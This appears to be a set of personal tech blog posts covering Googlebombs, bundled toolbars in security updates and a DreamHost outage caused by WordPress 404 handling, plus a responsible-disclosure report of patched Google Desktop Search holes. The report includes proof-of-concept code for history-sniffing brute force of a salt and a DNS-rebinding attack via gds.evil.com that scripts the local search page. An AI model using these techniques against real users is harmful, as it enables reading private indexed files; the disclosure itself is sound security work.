Accidental Googlebomb
Thursday, January 1st, 2009
This Google search now maligns C++. Oops!
Google suggests holding tomorrow's leak meeting on a cruise ship.
Somehow I don't think that would work very well. Leaks and ships don't mix well.
A Google search for "leave" still reflects the time when most porn sites had "age verification" on their front pages. "Age verification" often took the form of the text "You must be 18 to enter" followed by "Enter" and "Leave" links. The "Leave" link would often lead to a site appropriate for young kids or to a sex-education site.
Even today, when few new sites follow this practice, searches for "Leave No Trace" and "Leave It to Beaver" are beaten in the results by Yahoo, Google, Scarleteen, and Disney.
I wondered why Google's algorithm continued to make this possible despite tweaks to prevent Googlebombs such as "miserable failure". I came across this comment by Google engineer Matt Cutts:
[The algorithm change] really does have a very limited scope and doesn’t affect a large fraction of queries. The intent of the algorithm is to minimize the impact of “true” Googlebombs, which occur when someone is causing someone else’s page to rank for stuff that they wouldn’t want to rank for themselves. The algorithm could detect phrases such as [leave] as a Googlebomb in future iterations, but it doesn’t right now and I don’t think that Disney would care much either way.
Googlebombs were slightly embarrassing, but I imagine that abandoning link text would have hurt search quality a lot. I'm impressed that Google was able to come up with an algorithmic way to distinguish Googlebombs from other link text.
Google launched a free 411 service just in time for my move from San Diego to Mountain View. I found it useful, but it could have been even more useful if it:
Store hours would be nice too, but the service would also have to know when to say something like "Beach City Grill closes whenever the owner feels like closing, so you are advised to call before driving there."
Today's Java security update includes a checked-by-default "Install Google Toolbar for Internet Explorer" option. Shame on you, Sun and Google. Automatic security updates are no place to push unrelated, bundled software. Making security updates annoying hurts security almost as much as making security updates complicated: users will be less inclined to update next time.
This is similar to how Flash updates attempt to install the Yahoo Toolbar. It's certainly not as bad as the frequently updated AOL Instant Messenger, which turns on the "Today window" popup on every AIM account and adds a "Netscape ISP" icon to the desktop with every security update. But I thought Google was trying to set a good example.
Yesterday, at around 4pm, I noticed that the content on squarefree.com was missing, and the main page was an empty directory listing. I ssh'ed to my web server and noticed that the "squarefree.com" directory had been renamed to "squarefree.com_DISABLED_BY_DREAMHOST". Then I checked my email and saw a message from DreamHost support:
Hello,
I just had to disable your site squarefree.com as it's coming under some load and spawning countless php processes that are crashing the webserver. I wasn't able to figure out exactly what's going on, as leaving it up for more than a minute pretty much toasts the server. Please don't re-enable it until you've figured out what's going on, or disabled any possibly problematic php.
Thanks,
James
I jumped into #dreamhost on irc.freenode.net and started looking through my web server logs for suspicious requests. I was expecting to find that my blog had been DDoSed, perhaps by someone trying to leave comment spam. Instead, I found a large number of requests for nonexistent files, falling into two categories: requests for favicon.ico, and requests generated by the Real-time HTML Editor.
But why would 404 requests create PHP processes? Due to a recent change in WordPress, Apache was directing each 404 request to WordPress. WordPress used to put detailed rules in .htaccess -- for example, it would ask Apache to direct requests for http://www.squarefree.com/2005/ to WordPress using RewriteRule ^([0-9]{4})/?$. But newer versions of WordPress instead ask Apache to send it all requests for nonexistent files. I imagine this puts less strain on Apache when a site uses lots of WordPress Pages, but it hurts when a site gets lots of 404 requests. Several months ago, I had instructed WordPress to serve my custom 404 page for these requests, but WordPress still had to do a lot of work to determine that the requests should be treated as 404s.
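For reference, the catch-all block that newer versions of WordPress write to .htaccess looks roughly like this (reconstructed from memory, so treat it as a sketch rather than the exact rules on my server):

    # Newer WordPress: hand every request for a nonexistent file or
    # directory to index.php, which decides whether it is a Page, a
    # post, or a 404. PHP runs for every missing file as a result.
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

Under a flood of missing-file requests, each of those rewrites spawns PHP work, which is exactly what brought down the shared server.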
Once I realized what had happened, and determined that reconfiguring WordPress would be difficult, I did what I could to reduce the number of 404 requests WordPress would have to handle. I created a tiny favicon.ico file so those requests wouldn't be 404s, and I moved the Real-time HTML Editor onto its own subdomain so WordPress wouldn't handle the 404s it causes. My site was only down for 40 minutes, with the Real-time HTML Editor down a little longer while I waited for the new subdomain's DNS to propagate.
Some things DreamHost could have done better:
Some things DreamHost did right:
If anyone is wondering: yes, I still love DreamHost.
I released a new version of Search Keys to make it work with current versions of the Google and del.icio.us web sites. (Search Keys is a Firefox extension that lets you press a number to go to a result in a search engine, so you don't have to remove a hand from the keyboard after typing a search query.)
Google recently fixed several holes in Google Desktop Search that I found. This is the email I sent to security@google.com to report the holes:
This combination of security holes in multiple products allows an attacker to read text files indexed and cached by Google Desktop Search. Its success rate is proportional to the amount of time the attacker can keep the victim on the attacker's site and to the victim's CPU speed. I think all parts of this attack would work against both Firefox and Internet Explorer, but I've only tested part 1, and only in Firefox.
Recover the URL for the home page of Google Desktop Search
The URL for the front page of Google Desktop Search is http://127.0.0.1:4664/&s=nnnnnnnnnn for some 10-digit string nnnnnnnnnn. If the string is incorrect, GDS returns a page that says "Invalid Request". This seems to be a second line of defense against XSS and CSRF attacks.
Most browsers have information leaks that allow web scripts to determine whether a link is visited. The attacker assumes that the user has visited the GDS start page with the correct value for nnnnnnnnnn recently enough that the URL is in the browser's global history. Based on my experiments and calculations, it would take several days of CPU time for a script in an untrusted web page in Firefox to find out which of the 10^10 links of the form http://127.0.0.1:4664/&s=nnnnnnnnnn is visited. An attacker might try to keep a victim on a page for several days, or might try to keep a large number of users on his site for a shorter period of time. I don't know what algorithm generates the value nnnnnnnnnn, so I don't know if it has weaknesses that might allow the attacker's script to test fewer than 10^10 URLs.
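Here is a sketch of how such a history-sniffing script could work (the styling trick is my assumption about the method, and browsers have since closed this particular leak):

    // Assumes the attacker's stylesheet contains:
    //   a:visited { color: rgb(255, 0, 0); }
    function isVisited(url: string): boolean {
      const link = document.createElement("a");
      link.href = url;
      document.body.appendChild(link);
      const visited = getComputedStyle(link).color === "rgb(255, 0, 0)";
      document.body.removeChild(link);
      return visited;
    }

    // Brute force all 10^10 candidate salts -- days of CPU time, as noted above.
    function findSalt(): string | null {
      for (let n = 0; n < 1e10; n++) {
        const salt = n.toString().padStart(10, "0");
        if (isVisited("http://127.0.0.1:4664/&s=" + salt)) {
          return salt;
        }
      }
      return null;
    }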
Solutions: GDS could use a longer salt, to make iterating through every possible salt value harder. GDS could restrict salts to single use, but I think this would break too many things. Firefox (and other browsers) could plug the information leaks in global history.
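To put rough numbers on the longer-salt suggestion (the check rate here is my assumption, purely for illustration):

    // Estimated brute-force time as a function of salt length, assuming
    // an attacker can test 50,000 visited links per second of CPU time.
    function bruteForceDays(saltDigits: number): number {
      const checksPerSecond = 50_000;
      const secondsPerDay = 86_400;
      return Math.pow(10, saltDigits) / checksPerSecond / secondsPerDay;
    }

    bruteForceDays(10); // ~2.3 days: feasible for a patient attacker
    bruteForceDays(20); // ~2.3e10 days: hopeless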
References:
- https://bugzilla.mozilla.org/show_bug.cgi?id=57351
- https://bugzilla.mozilla.org/show_bug.cgi?id=147777
Perform a Princeton DNS attack
First, make gds.evil.com resolve to an IP under the control of the attacker, with a short TTL. Make the victim load http://gds.evil.com:4664/, which contains a script. Then make gds.evil.com resolve to 127.0.0.1. The script then creates an iframe that loads http://gds.evil.com:4664/&s=nnnnnnnnnn and uses cross-frame scripting to control the page served by GDS.
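Once the second resolution takes effect, the attacker's page and the GDS page appear to the browser to share an origin (same hostname, same port), so the cross-frame scripting step is ordinary same-origin DOM access. A sketch, assuming the salt was recovered in part 1:

    // Runs on http://gds.evil.com:4664/ after gds.evil.com has been
    // re-pointed to 127.0.0.1. The iframe below has the same host and
    // port, so the browser treats the two pages as same-origin.
    const salt = "0123456789"; // hypothetical value recovered in part 1
    const frame = document.createElement("iframe");
    frame.src = "http://gds.evil.com:4664/&s=" + salt;
    document.body.appendChild(frame);
    frame.onload = () => {
      // Cross-frame scripting: read (or drive) the GDS page directly.
      const gdsDocument = frame.contentDocument!;
      console.log(gdsDocument.body.innerText);
    };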
You can check that GDS does not prevent this part of the attack by loading GDS and then replacing 127.0.0.1 in the URL with warez.squarefree.com (which resolves to 127.0.0.1).
Solutions: GDS could reject requests where the hostname is not "127.0.0.1" or "localhost" (IMO, the HTTP protocol requires it to do so). Firefox, Windows XP, the Windows XP firewall, or my ISP could prevent "external" DNS names from resolving to "internal" IP addresses like 127.0.0.1.
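The first fix amounts to validating the Host header before serving anything. A minimal sketch of the idea (my illustration, not Google's actual code):

    // Reject requests whose Host header names anything other than the
    // loopback interface, which defeats rebinding names like gds.evil.com.
    import * as http from "http";

    http.createServer((req, res) => {
      const host = (req.headers.host ?? "").split(":")[0];
      if (host !== "127.0.0.1" && host !== "localhost") {
        res.writeHead(403);
        res.end("Invalid Request");
        return;
      }
      // ...serve the local search UI as usual...
      res.end("search results here");
    }).listen(4664, "127.0.0.1");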
References:
- http://www.cs.princeton.edu/sip/news/dns-scenario.html
- http://viper.haque.net/~timeless/blog/11/
- http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.2
- http://bugzilla.mozilla.org/show_bug.cgi?id=162871
- http://bugzilla.mozilla.org/show_bug.cgi?id=174590
- http://bugzilla.mozilla.org/show_bug.cgi?id=205726
- http://bugzilla.mozilla.org/show_bug.cgi?id=223861
Combining the holes
Once the attacker has script access to http://gds.evil.com:4664/, has gds.evil.com resolving to 127.0.0.1, and knows the hash for the home page, he can search for text files and view cached text files. (The links to cached text files are absolute and have 127.0.0.1 as the hostname, but they continue to work when 127.0.0.1 is replaced by warez.squarefree.com, which resolves to 127.0.0.1.)
I sent this email on Feb 13, 2005. The first part was fixed in version 20050227 by making the salt longer. The second part was fixed in version 20050325 by making GDS reject requests with hostnames other than "127.0.0.1" and "localhost". Google started pushing the updated version to existing users on June 2, 2005, so most users should be upgraded by now. You can see what version of GDS you have by clicking "About".
This is not the same as the hole found by Rice students (Slashdot article), which had been fixed previously.